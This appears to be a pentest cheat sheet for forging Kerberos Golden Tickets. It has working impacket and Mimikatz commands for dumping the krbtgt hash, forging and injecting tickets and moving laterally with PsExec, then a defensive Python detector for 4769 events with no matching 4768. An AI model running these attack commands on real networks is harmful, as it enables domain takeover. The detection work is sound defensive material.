Assume that you have two domains: one parent domain and subordinate domain(s). Once you have compromised the subordinate domain, you want access to the parent and/or other domain(s). In this scenario, use a Golden Ticket to get enterprise admin access to the entire domain.
With Kali
# Get Domain SID
python lookupsid.py ignite/Administrator:Ignite@987@192.168.1.105

# Get Krbtgt hash & domain name
python secretsdump.py administrator:Ignite@987@192.168.1.105 -outputfile krb -user-status

# Create a Golden Ticket
python ticketer.py -nthash f3bc61e97fb14d18c42bcbf6c3a9055f -domain-sid S-1-5-21-3523557010-2506964455-2614950430 -domain ignite.local raj  # random user

# Import it into memory
export KRB5CCNAME=/root/Tools/impacket/examples/raj.ccache
Windows: Access with Golden Ticket now
# Mimikatz
# Extract the domain name, SID and krbtgt hash
privilege::debug
lsadump::lsa /inject /name:krbtgt

# Create a Golden Ticket and access other machines now
kerberos::golden /user:pavan /domain:ignite.local /sid:S-1-5-21-3523557010-2506964455-2614950430 /krbtgt:f3bc61e97fb14d18c42bcbf6c3a9055f /id:500 /ptt

# Get a new command prompt
misc::cmd

# Access another machine
PsExec64.exe \\192.168.1.105 cmd.exe
Windows: Access with Golden Ticket later
# Create the Golden Ticket and save it as ticket.kirbi
kerberos::golden /user:pavan /domain:ignite.local /sid:S-1-5-21-3523557010-2506964455-2614950430 /krbtgt:f3bc61e97fb14d18c42bcbf6c3a9055f /id:500

# Import the ticket into memory
kerberos::ptt ticket.kirbi
misc::cmd

# Access other machines
PsExec64.exe \\192.168.1.105 cmd.exe
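Detection side: a Golden Ticket is built offline from the krbtgt hash, so the domain controller never logs a TGT request (event 4768) for it, only the later service-ticket requests (event 4769). The Python below is an added example, not part of the original page, that flags 4769 events with no matching 4768 from the same account and client inside the ticket lifetime. The event dictionaries, the field selection, the sample values and the 10-hour window (the default domain policy) are assumptions.

```python
from datetime import datetime, timedelta

# Assumption: default AD policy "Maximum lifetime for user ticket" = 10 hours.
MAX_TGT_LIFETIME = timedelta(hours=10)

# Constructed sample events (not real logs), reduced to the fields used below.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TimeCreated": "2024-05-01T08:00:00",
     "TargetUserName": "alice", "IpAddress": "::ffff:192.0.2.10"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T08:05:00",
     "TargetUserName": "alice@EXAMPLE.LOCAL", "IpAddress": "::ffff:192.0.2.10"},
    # Service ticket requested, but this account/client never asked for a TGT.
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:00:00",
     "TargetUserName": "svc-backup@EXAMPLE.LOCAL", "IpAddress": "::ffff:192.0.2.77"},
    # The TGT request exists but is older than the maximum ticket lifetime.
    {"EventID": 4768, "TimeCreated": "2024-05-01T01:00:00",
     "TargetUserName": "bob", "IpAddress": "::ffff:192.0.2.20"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T12:30:00",
     "TargetUserName": "bob@EXAMPLE.LOCAL", "IpAddress": "::ffff:192.0.2.20"},
]

def _key(event):
    """Normalise account (4769 logs user@REALM, 4768 logs user) and client IP."""
    user = event["TargetUserName"].split("@", 1)[0].lower()
    host = event["IpAddress"].replace("::ffff:", "")
    return user, host

def find_orphan_service_tickets(events, window=MAX_TGT_LIFETIME):
    """Return (time, user, client) for 4769 events lacking a recent 4768.

    Heuristic only: ticket renewals and domain controllers whose logs are not
    collected cause false positives, so treat each hit as a lead to triage.
    """
    last_tgt = {}   # (user, client) -> time of most recent 4768
    orphans = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        when = datetime.fromisoformat(ev["TimeCreated"])
        key = _key(ev)
        if ev["EventID"] == 4768:
            last_tgt[key] = when
        elif ev["EventID"] == 4769:
            issued = last_tgt.get(key)
            if issued is None or when - issued > window:
                orphans.append((ev["TimeCreated"], *key))
    return orphans

if __name__ == "__main__":
    for hit in find_orphan_service_tickets(SAMPLE_EVENTS):
        print("4769 without a recent 4768:", hit)
```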